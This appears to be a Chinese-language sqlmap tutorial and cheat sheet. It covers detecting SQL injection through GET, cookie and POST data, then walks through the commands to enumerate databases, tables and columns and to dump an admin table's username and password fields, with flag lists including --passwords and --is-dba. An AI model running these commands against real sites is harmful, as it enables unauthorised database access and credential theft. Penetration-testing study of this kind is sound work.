檢測注入
基本格式
sqlmap -u 「
預設使用level1檢測全部資料庫型別
sqlmap -u 「 –dbms mysql –level 3
指定資料庫型別為mysql,級別為3(共5級,級別越高,檢測越全面)
跟隨302跳轉
當注入頁面錯誤的時候,自動跳轉到另乙個頁面的時候需要跟隨302,
當注入錯誤的時候,先報錯再跳轉的時候,不需要跟隨302。
目的就是:要追蹤到錯誤資訊。
cookie注入
當程式有防get注入的時候,可以使用cookie注入
sqlmap -u 「 –cookie 「id=11」 –level 2(只有level達到2才會檢測cookie)
從post資料報中注入
可以使用burpsuite或者temperdata等工具來抓取post包
sqlmap -r 「c:\tools\request.txt」 -p 「username」 –dbms mysql 指定username引數
注入成功後
獲取資料庫基本資訊
sqlmap -u 「 –dbms mysql –level 3 –dbs
查詢有哪些資料庫
sqlmap -u 「 –dbms mysql –level 3 -d test –tables
查詢test資料庫中有哪些表
sqlmap -u 「 –dbms mysql –level 3 -d test -t admin –columns
查詢test資料庫中admin表有哪些字段
sqlmap -u 「 –dbms mysql –level 3 -d test -t admin -c 「username,password」 –dump
dump出欄位username與password中的資料
這裡我使用kali自帶的sqlmap
sqlmap詳細命令:
–is-dba 當前使用者許可權(是否為root許可權)
–dbs 所有資料庫
–current-db **當前資料庫
–users 所有資料庫使用者
–current-user 當前資料庫使用者
–random-agent 構造隨機user-agent
–passwords 資料庫密碼
–proxy http://local:8080 –threads 10 (可以自定義執行緒加速) **
–time-sec=timesec dbms響應的延遲時間(預設為5秒)
sqlmap簡單使用
u 檢測存在可利用漏洞 dbs 獲取所有庫 current db 列出當前資料庫 d 庫名 tables 查詢此庫中存在的表 d 庫名 t 表名 columns 列出表中的所有列 d 庫名 t 表名 c 列名1,列名2 dump 匯出列中的所有資料 sqlmap.py u url sqlmap.py...
SqlMap介紹及使用
在sqlmap.py檔案下執行cmd 引數 u 指定注入點url batch 程式自動把所有需要輸入的y自動輸入 c python27 sqlmap python sqlmap.py u batch 例 注入結果展示 1 注入引數id為get注入,注入型別有四種分別為 boolean based b...
sqlmap簡單的使用步驟
sqlmap用於 sqlmap是一款非常強大的開源sql自動化注入工具,可以用來檢測和利用sql注入漏洞。注意 sqlmap只是用來檢測和利用sql注入點的,使用前請先使用掃瞄工具掃出sql注入點。1 檢測注入 get注入 sqlmap u 預設使用level1檢測全部資料庫型別 sqlmap u ...